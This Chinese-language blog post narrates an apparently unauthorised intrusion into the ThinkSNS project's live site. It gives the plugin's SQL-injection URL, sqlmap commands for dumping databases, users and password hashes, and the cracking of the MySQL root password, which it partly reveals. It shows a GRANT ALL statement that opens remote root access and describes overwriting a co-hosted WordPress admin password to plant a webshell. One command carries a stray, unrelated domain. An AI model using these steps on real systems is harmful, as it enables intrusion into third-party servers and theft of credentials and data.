（本文涉及的所有漏洞已经被修复！）

（由于文章是后来补写的，有些图可能无法抓到。sorry）

ThinkSNS(简称TS)，开源微博引擎。

一直都在看thinksns的代码，但是由于很彩笔，一直没找到什么实质的漏洞，

某天在90sec上，看到某黑阔发的thinksns注入0day，看了下，是一个插件的注入，注入点:index.php?app=blog& mod=Index&act=show&id=2211，惭愧啊，差距啊，羞愤难平的我心中冒出了邪恶的想法。。。。。

--------------------分割线------------------------

0x01  Nmap照亮前方的路

nmap -sS -sU -T4 -A -v thinksns.com

我最喜欢的一个配置，速度也不错，

linux服务器，apache

哈哈，lamp配置

果断看到一个3306

嘎嘎，本地的mysql

然后，就没收集到什么了。。。。。

0x02  Sqlmap凸显神威

http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211

拿到注入点，为了抓紧时间，和管理员赛跑，直接上sqlmap！

# sqlmap.py -u http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211

回显了数据库版本，5.x的

很好，可以注入！

# sqlmap.py -u http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211  --dbs

列出了所有库

oh，great！

一个t_thinksns

一个thinksns

一个wp的blog的库

还有几个小库

于是想直接注入t_thinksns这个库

# sqlmap.py -u http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211 --tables   -D t_thinksns

然后一步步爆密码

其实我个人感觉如果只是注入的话，union select肯定更快，但是我电脑装的ubuntu，是没有小葵那个转码工具的，虽然可以用burp suite的 编码转换，但是，不喜欢用

搞到密码。开始跑。。。。。

忽然发现哥又二逼了，这种站，找不到后台的吧。。。

​

翻了好多页都没看到后台

这里在啰嗦下，其实也可以用so.360.cn 这个二货引擎抓取了好多大站后台，无视robots

然后

# sqlmap.py -u http://www.2cto.com /index.php?app=blog&mod=Index&act=show&id=2211 --users

注入mysql的用户试试

我其实比较性急，所以直接注入，看能不能得到，我一般都不看注入权的

激动了，竟然得到了几个用户 root t_thinsns(应该就是这个注入的用户)还有几个不记得了

# sqlmap.py -u http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211 --passwords

果断得到root的密文！权限真大啊

于是想直接去写shell

哪知道完全爆不到路径

googlehack也没报到，fuck。。。

于是去破解root的密文

放到md5破解 成功了- -

运气真好！

 密文ts**00

 

然后果断

# sqlmap.py -u http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211 --sql-shell

得到了一个交互的shell

system vi /etctpd/conftpd.conf;

我表示还是想找下路径，写shell有安全感。。。。

目测交互性很差，什么回显都没- -，于是执行了

GRANT ALL PRIVILEGES ON *.* TO ‘root’@'%’ IDENTIFIED BY ‘ts**00’ WITH GRANT OPTION;

开启外连

也不知道成功了没- -

期间我还用metaspolit执行过，不知道是哪个起的作用

到这里 Sqlmap貌似就失去了他的魅力- -

0x03 Windows下的延续

有了root ，我马上换了windows

毕竟这个更熟悉

首先我试了试Navicat

​

 

 

成功连接，看来开启外联成功了

然后，，，再vi。。。

 

执行成功，又没回显

根据经验，应该是交互性差了的原因

果断换mysql

读出来了

 

这一段是在战虎基友帮助下完成的，我的mysql似乎sb了

飞 15:42:29

你试试system函数

’ 战虎 15:42:28

你换个环境试试。

’ 战虎 15:42:40

你自己 装的那个mysql 有问题。

飞 15:42:43

- -

飞 15:42:47

appserv

飞 15:42:50

继承

’ 战虎 15:42:52

..

’ 战虎 15:42:57

我的也是

可是，还是完全没权限写到web目录，权重做得真好啊！！

0x04 另辟蹊径 山回路转

一下子顿时sb了。。。

怎么办，怎么办

忽然想到旁注上面还有好多站，有个blog，一下子又激动了！！

*其实爆路径

更ＮＢ的是用谷歌浏览器　 直接访问加入个linux.php 爆路径（战虎提供的思路）

然后，navicat直接找到那个blog的数据库，

发现密码很黑阔，

 

不过我们不怕，既然解密不出管理的密码，我们本地搭建wp-blog

然后生成一个密码，覆盖之，

以后再还原！！！

wp的后台一般都比较弱智，后台拿shell更无聊，果断跳过！

最后成功拿到shell！！！

 

可以跨目录！

哦也成功！！

至于提权，那是exp的事情了，菜B提不下来

这里，十分感谢战虎，他的经验和他的真诚真的让我很感动，有你相伴，渗透之路更加金彩